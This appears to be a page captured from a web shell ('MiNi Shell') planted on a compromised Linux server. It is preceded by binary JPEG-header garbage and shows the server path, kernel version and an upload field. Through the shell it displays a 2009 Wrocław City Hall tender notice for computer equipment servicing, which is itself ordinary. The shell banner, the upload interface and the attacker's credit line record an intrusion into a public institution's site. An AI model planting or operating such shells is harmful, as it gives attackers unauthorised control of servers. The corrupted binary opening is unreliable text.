JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090223/41157-N-2009.html

<p class="kh_header"><b>Wrocław: Serwis sprzętu komputerowego funkcjonującego w UMW</b><br>
<b>Numer ogłoszenia: 41157 - 2009; data zamieszczenia: 23.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wrocław Urząd Miejski Wrocławia , pl. Nowy Targ 1/8, 50-141 Wrocław, woj. dolnośląskie, tel. 071 7779230, 7779231, faks 071 7779229.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Serwis sprzętu komputerowego funkcjonującego w UMW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem niniejszego zamówienia jest serwis naprawczy, modernizacyjny 
 i konserwatorski obejmujący funkcjonujące u Zamawiającego komputery, notebooki, drukarki, plotery oraz pozostały sprzęt komputerowy - nie objęty gwarancją dostawcy bądź producenta. Istotnym elementem składowym usługi będzie wymiana uszkodzonych bądź zużytych (wyeksploatowanych) części urządzeń, a także ich modernizacja i rozbudowa.
2.	Zgłoszenia o awarii sprzętu dokonywane są telefonicznie i następnie potwierdzane faksem lub mailem przez upoważnione do tego osoby w dni robocze w godzinach 
8:00 -15:30. 
 
3.	Gwarantowany czas reakcji Wykonawcy na zgłoszenie awarii liczony jest od momentu przesłania zgłoszenia do odbioru sprzętu z podanej lokalizacji. Gwarantowany czas usunięcia awarii  liczony jest od momentu przesłania zgłoszenia do momentu zwrotu sprawnego sprzętu. Czasy reakcji i czasy naprawy zależą od kategorii serwisowej sprzętu zaznaczonej na zleceniu i wynoszą odpowiednio: 
a) dla kategorii standardowej czas reakcji 16 godzin roboczych, czas naprawy 4 dni robocze, 
b) dla kategorii priorytetowej:
-	dla drukarek lokalnych: czas reakcji 8 godzin roboczych z jednoczesnym podstawieniem drukarki zastępczej o podobnym standardzie,
-	dla pozostałego sprzętu komputerowego: czas reakcji 8 godzin roboczych, czas naprawy 2 dni robocze,
c) dla drukarek sieciowych czas reakcji 4 godziny robocze z jednoczesnym podstawieniem drukarki sieciowej o podobnym standardzie.

4.	Wykonawca udzieli gwarancji na wykonywane przez siebie naprawy, 
modernizacje oraz użyte do naprawy części i materiały na okres 12 miesięcy. 
 
5.	Serwis naprawczy świadczony będzie na zasadach określonych w załączniku nr 1 do Projektu umowy - Zasady sprawowania usługi serwisowej sprzętu komputerowego.

6.	W celu umożliwienia Wykonawcy właściwej kalkulacji kosztów wykonania niniejszego zamówienia, Zamawiający przedstawia następującą szacunkową informację dotyczącą sprzętu funkcjonującego w Urzędzie Miejskim Wrocławia, który będzie objęty opieką serwisową w 2009r. oraz informacje o interwencjach serwisowych podjętych 
u Zamawiającego w roku ubiegłym:


Szacunkowa informacja dotycząca sprzętu funkcjonującego w Urzędzie Miejskim, który będzie objęty umową serwisową w 2009 roku 

OPIS	ILOŚĆ	  UDZIAŁ
Komputery stacjonarne HP 		
łącznie	696	100,00%
D230	501	71,98%
D330	195	28,02%
Komputery notebook		
łącznie	76	100,00%
HP nx9000	59	77,63%
Firmy ASUS	10	13,16%
INNE	7	9,21%






OPIS 	ILOŚĆ	UDZIAŁ
Drukarki firmy Hewlett-Packard		
łączna ilość  	466 szt.	97,90%
w tym drukarki laserowe biurkowe razem	354 szt.	74,37%
w tym model HP LaserJet 1100 	160 szt.	 
w tym model HP LaserJet 1100A	41 szt.	 
w tym model HP LaserJet 1200 	125 szt.	 
w tym model HP LaserJet 1220 	28 szt.	 
w tym wyższe modele razem	51 szt.	10,71%
w tym modele HP LaserJet 4000 	3 szt.	 
w tym modele HP LaserJet 4050(N) 	7 szt.	 
w tym modele HP LaserJet 4550	3 szt.	
w tym modele HP LaserJet 4 	4 szt.	 
w tym modele HP LaserJet 5 	10 szt.	 
w tym modele HP LaserJet 2100	5 szt.	 
w tym modele HP LaserJet 2200(DN)	17 (8) szt.	 
w tym model HP LaserJet 5Si	2 szt.	 
w tym model HP LaserJet 5000N	4 szt.	 
w tym model HP LaserJet 5100	3 szt.	 
w tym model HP LaserJet 8000	1 szt.	 
w tym model HP LaserJet 8150DN	1 szt.	 
w tym model HP LaserJet 8500N	1 szt.	 
w tym drukarki atramentowe formatu A4	49 szt.	10,29%
w tym rodzina DeskJet 600    (600,660,690)	6 szt.	 
w tym rodzina DeskJet 700    (710,720)	8 szt.	 
w tym rodzina DeskJet 800    (815,845,870)	9 szt.	 
w tym rodzina DeskJet 900     (970,980)	23 szt.	 
w tym rodzina PhotoSmart (7450,7550, 8250)	3 szt.	 
w tym drukarki atramentowe formatu A3	6 szt.	1,26%
w tym HP DeskJet 1220C	2 szt.	 
w tym HP DeskJet 2500C	4 szt.	 
w tym drukarki HP PSC 750	3 szt.	0,63%
Plotery firmy Hewlett-Packard	 	 
łączna ilość	3 szt.	0,63%
HP DesidnJet 800, HP DesignJet 350C0, HP DesignJet 1050C 	 	 
Drukarki inne niż firmy Hewlett-Packard	 	 
łączna ilość	10 szt.	2,10%
w tym firmy OKI	6 szt.	 


W 2008 roku zarejestrowano następujące interwencje w ramach umowy serwisowej:

 	łącznie w 2008r	średnio w miesiącu	%
Interwencje (wszystkie):	228	20,72	100,00%
      w tym naprawy      	154	14,00	67,54%
            w tym konserwacja	6	0,55	2,63%
         w tym ekspertyza  	68	6,18	29,82%

Pozostałe warunki realizacji zamówienia zawarte są w Projekcie umowy.

Wykonawca jest zobowiązany do wskazania w ofercie części zamówienia, którą zamierza powierzyć podwykonawcom (art. 36 ust. 4 ustawy Pzp).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.31.20.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego ubiegać się mogą Wykonawcy, którzy:

1.	spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych,

2.	wykonali (lub wykonują) z należytą starannością w ciągu ostatnich trzech lat (jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie) przed dniem wszczęcia postępowania o udzielenie zamówienia, co najmniej dwie usługi, polegające na realizacji opieki serwisowej sprzętu komputerowego, na kwotę o wartości minimum 70.000,00 zł brutto każda oraz udokumentują, że zamówienia te zostały wykonane należycie,

3.	dysponują lub będą dysponować co najmniej trzema osobami zdolnymi do wykonania niniejszego zamówienia, które posiadają minimum 2 letnie doświadczenie w pracy na stanowisku serwisanta sprzętu komputerowego.
Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana według formuły: spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dla udokumentowania spełniania wymaganych warunków udziału w postępowaniu do Formularza oferty Wykonawcy muszą dołączyć:

w formie oryginału:

1. oświadczenie z art. 22 ust. 1 ustawy Pzp,

w formie oryginału lub kserokopii poświadczonej ,,za zgodność z oryginałem przez Wykonawcę (§ 4.1. Rozporządzenia w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane), opatrzonej imienną pieczątką  i własnoręcznym podpisem:

2.	wykaz zrealizowanych (lub realizowanych) z należytą starannością w ciągu ostatnich trzech lat (jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie) przed dniem wszczęcia postępowania o udzielenie zamówienia, co najmniej dwóch usług polegających na realizacji opieki serwisowej sprzętu komputerowego, na kwotę o wartości minimum 70.000,00 zł. brutto każda z podaniem ich wartości, przedmiotu, dat wykonania i zamawiających,

3.	wykaz co najmniej trzech osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacją dotyczącą ich doświadczenia zawodowego (tj. minimum dwuletniego doświadczenia w pracy na stanowisku serwisanta sprzętu komputerowego dla każdej 
z osób),
4.	pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie osób, o którym mowa powyżej Wykonawca wskaże osoby, którymi będzie dysponował.

5.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Odpis (zaświadczenie) musi zawierać aktualny wykaz osób uprawnionych do reprezentowania Wykonawcy. Wykonawcy, którzy dokonali zmian w zakresie organów zarządzających, które nie są uwidocznione w dokumencie rejestrowym winni złożyć dokumenty potwierdzające powołanie nowych osób w skład organu zarządzającego (np. uchwała w sprawie powołania określonej osoby).

A) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt. 5 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
B) Dokument, o którym mowa w pkt A) powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
C) Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o których mowa w pkt A), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Postanowienia powyższego pkt B) stosuje się odpowiednio.
WYKONAWCY UBIEGAJĄCY SIĘ WSPÓLNIE O ZAMÓWIENIE:
a)	Dokument wymieniony w pkt. 5 musi być złożony odrębnie przez każdego 
z Wykonawców.
b)	Dokumenty wymienione w pkt  2, 3 i 4 mogą wykonawcy złożyć jako jeden wspólny dla wszystkich wykonawców ze wskazaniem w tzw. ,,uwagach (w przypadku wykazów), którego wykonawcy i w jakim zakresie ów dokument dotyczy,
Warunki dotyczące doświadczenia oraz potencjału osobowego badane będą łącznie.
c)	Oświadczenie wymienione w pkt. 1 wykonawcy składają wspólnie na jednym dokumencie (oświadczenie podpisane przez pełnomocnika lub każdego z wykonawców).
d)	 W Formularzu ofertowym w części dotyczącej wskazania Wykonawcy i dotyczących go danych (m.in. danych adresowych) - należy wpisać wszystkich Wykonawców i wszystkie dotyczące ich dane (m.in. dane adresowe).
e)	Do oferty musi być załączone - pełnomocnictwo do reprezentowania Wykonawców                  w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu                       i zawarcia umowy w sprawie zamówienia publicznego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.wroc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Wrocławia  
Wydział Zamówień Publicznych,
51-163 Wrocław
al. M. Kromera 44
pok. 339 (III piętro).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2009 godzina 10:00, miejsce: Urząd Miejski Wrocławia  
Wydział Zamówień Publicznych,
51-163 Wrocław
al. M. Kromera 44
pok. 339 (III piętro).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com